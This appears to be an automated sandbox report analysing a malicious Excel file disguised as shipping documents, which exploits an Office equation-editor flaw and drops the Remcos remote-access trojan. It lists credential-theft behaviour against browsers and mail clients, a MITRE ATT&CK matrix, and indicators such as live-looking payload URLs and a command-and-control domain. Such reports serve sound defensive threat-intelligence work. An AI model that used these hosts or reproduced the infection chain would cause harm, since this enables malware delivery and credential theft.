Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

16_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		16_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \key3.db		16_2_0040BB30

Searches for Windows Mail specific files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ESMTPPassword	19_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	19_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	19_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 4044, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: cmd.exe

16_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	231 Scripting	Valid Accounts	11 Windows Management Instrumentation	231 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	15 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Bypass User Account Control	21 Obfuscated Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	43 Exploitation for Client Execution	1 Windows Service	1 Access Token Manipulation	1 Install Root Certificate	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	2 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	223 Command and Scripting Interpreter	1 Browser Extensions	1 Windows Service	1 DLL Side-Loading	3 Credentials In Files	4 File and Directory Discovery	Distributed Component Object Model	211 Input Capture	214 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	Network Logon Script	422 Process Injection	1 Bypass User Account Control	LSA Secrets	39 System Information Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	13 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	422 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	21%	ReversingLabs	Win32.Exploit.CVE-2017-0199
waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	26%	Virustotal		Browse
waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715CC54E.doc	100%	Avira	HEUR/Rtf.Malformed

Source	Detection	Scanner	Label
http://www.imvu.comr	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	0%	URL Reputation	safe
https://gmpg.org/xfn/11	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://login.yahoo.com/config/login	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://www.imvu.com	0%	URL Reputation	safe
https://api.w.org/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://asociatiatraditiimaria.ro/feed/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Avira URL Cloud	safe
http://acdn.adnxs.com/ast/ast.js	0%	Avira URL Cloud	safe
http://b.scorecardresearch.com/beacon.js	0%	Avira URL Cloud	safe
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	0%	Avira URL Cloud	safe
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	0%	Avira URL Cloud	safe
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm	100%	Avira URL Cloud	malware
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	0%	Avira URL Cloud	safe
http://www.ebuddy.com	0%	URL Reputation	safe
https://support.google.com/chrome/?p=plugin_flash	0%	Avira URL Cloud	safe
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	0%	Avira URL Cloud	safe
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	0%	Avira URL Cloud	safe
http://198.46.176.133	0%	Avira URL Cloud	safe
http://www.nirsoft.net	0%	Avira URL Cloud	safe
https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767	0%	Avira URL Cloud	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1	0%	Avira URL Cloud	safe
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	0%	Avira URL Cloud	safe
http://cache.btrll.com/default/Pix-1x1.gif	0%	Avira URL Cloud	safe
https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://o.aolcdn.com/ads/adswrappermsni.js	0%	Avira URL Cloud	safe
https://asociatiatraditiimaria.ro	0%	Avira URL Cloud	safe
http://104.168.45.34/59/bn/createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc	0%	Avira URL Cloud	safe
http://www.msn.com/?ocid=iehp	0%	Avira URL Cloud	safe
http://www.msn.com/de-de/?ocid=iehp	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	0%	Avira URL Cloud	safe
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	0%	Avira URL Cloud	safe
http://static.chartbeat.com/js/chartbeat.js	0%	Avira URL Cloud	safe
https://asociatiatraditiimaria.ro/os/transportment.pfm	100%	Avira URL Cloud	malware
http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIF	0%	Avira URL Cloud	safe
http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFj	0%	Avira URL Cloud	safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	0%	Avira URL Cloud	safe
http://104.168.45.34	0%	Avira URL Cloud	safe
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	0%	Avira URL Cloud	safe
iwarsut775laudrye2.duckdns.org	100%	Avira URL Cloud	malware
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	0%	Avira URL Cloud	safe
http://www.nirsoft.net/	0%	Avira URL Cloud	safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	0%	Avira URL Cloud	safe
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	0%	Avira URL Cloud	safe
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	0%	Avira URL Cloud	safe
http://hq.ax/Oi8yX	0%	Avira URL Cloud	safe
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	0%	Avira URL Cloud	safe
https://www.ccleaner.com/go/app_cc_pro_trialkey	0%	Avira URL Cloud	safe
https://contextual.media.net/	0%	Avira URL Cloud	safe
http://www.imvu.com/cK	0%	Avira URL Cloud	safe
http://198.46.176.133/Upload/vbs.jpeg	100%	Avira URL Cloud	malware
https://contextual.media.net/8/nrrV73987.js	0%	Avira URL Cloud	safe
https://asociatiatraditiimaria.ro/comments/feed/	0%	Avira URL Cloud	safe
https://hq.ax/Oi8	0%	Avira URL Cloud	safe
http://hq.ax/Oi8	0%	Avira URL Cloud	safe
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js	0%	Avira URL Cloud	safe
https://asociatiatraditiimaria.ro/wp-json/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Avira URL Cloud	safe
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	0%	Avira URL Cloud	safe
http://www.msn.com/	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	Avira URL Cloud	safe
http://hq.ax/	0%	Avira URL Cloud	safe
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549	0%	Avira URL Cloud	safe
http://new.quranushaiqer.org.sa	100%	Avira URL Cloud	malware
https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2	0%	Avira URL Cloud	safe
https://new.quranushaiqer.org.sa	100%	Avira URL Cloud	malware
http://cdn.at.atwola.com/_media/uac/msn.html	0%	Avira URL Cloud	safe
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset	0%	Avira URL Cloud	safe
http://go.microsoft.c	0%	Avira URL Cloud	safe
http://104.168.45.34/59/LMTS.txt	0%	Avira URL Cloud	safe
https://policies.yahoo.com/w3c/p3p.xml	0%	Avira URL Cloud	safe
https://www.google.com/accounts/servicelogin	0%	Avira URL Cloud	safe
http://www.msn.com/advertisement.ad.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
hq.ax	188.114.96.3	true	true	unknown
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
asociatiatraditiimaria.ro	93.113.54.56	true	false	unknown
shortify.pro	188.114.97.3	true	false	unknown
geoplugin.net	178.237.33.50	true	false	unknown
iwarsut775laudrye2.duckdns.org	192.253.251.227	true	true	unknown
new.quranushaiqer.org.sa	34.166.62.190	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm	true	Avira URL Cloud: malware	unknown
http://104.168.45.34/59/bn/createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc	true	Avira URL Cloud: safe	unknown
https://asociatiatraditiimaria.ro/os/transportment.pfm	false	Avira URL Cloud: malware	unknown
http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIF	true	Avira URL Cloud: safe	unknown
iwarsut775laudrye2.duckdns.org	true	Avira URL Cloud: malware	unknown
http://198.46.176.133/Upload/vbs.jpeg	false	Avira URL Cloud: malware	unknown
https://hq.ax/Oi8	false	Avira URL Cloud: safe	unknown
http://hq.ax/Oi8	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
http://104.168.45.34/59/LMTS.txt	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://b.scorecardresearch.com/beacon.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://acdn.adnxs.com/ast/ast.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://www.imvu.comr	RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://asociatiatraditiimaria.ro/feed/	powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	RegAsm.exe, 00000012.00000002.479747279.0000000002351000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
